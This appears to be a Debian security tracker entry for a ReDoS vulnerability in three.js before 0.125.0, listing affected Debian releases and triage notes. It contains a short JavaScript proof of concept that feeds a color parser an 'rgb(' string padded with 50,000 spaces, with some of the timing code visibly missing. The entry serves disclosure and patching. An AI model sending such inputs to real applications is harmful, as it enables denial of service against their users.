DescriptionThis affects the package three before 0.125.0. This can happen when handling rgb or hsl colors. PoC: var three = require('three') function build_blank (n) { var ret = "rgb(" for (var i = 0; i < n; i++) { ret += " " } return ret + ""; } var Color = three.Color var time =; new Color(build_blank(50000)) var time_cost = - time; console.log(time_cost+" ms")
SourceCVE (at NVD; CERT, LWN, oss-sec, fulldisc, bugtraq, EDB, Metasploit, Red Hat, Ubuntu, Gentoo, SUSE bugzilla/CVE, Mageia, GitHub code/issues, web search, more)
NVD severitymedium

Vulnerable and fixed packages

The table below lists information on source packages.

Source PackageReleaseVersionStatus
three.js (PTS)stretch73+dfsg-1vulnerable
bullseye, sid111+dfsg1-2vulnerable

The information below is based on the following data on fixed versions.

PackageTypeReleaseFixed VersionUrgencyOriginDebian Bugs


[buster] - three.js <no-dsa> (Minor issue)
[stretch] - three.js <no-dsa> (can be fixed along in next DLA)

Search for package or bug name: Reporting problems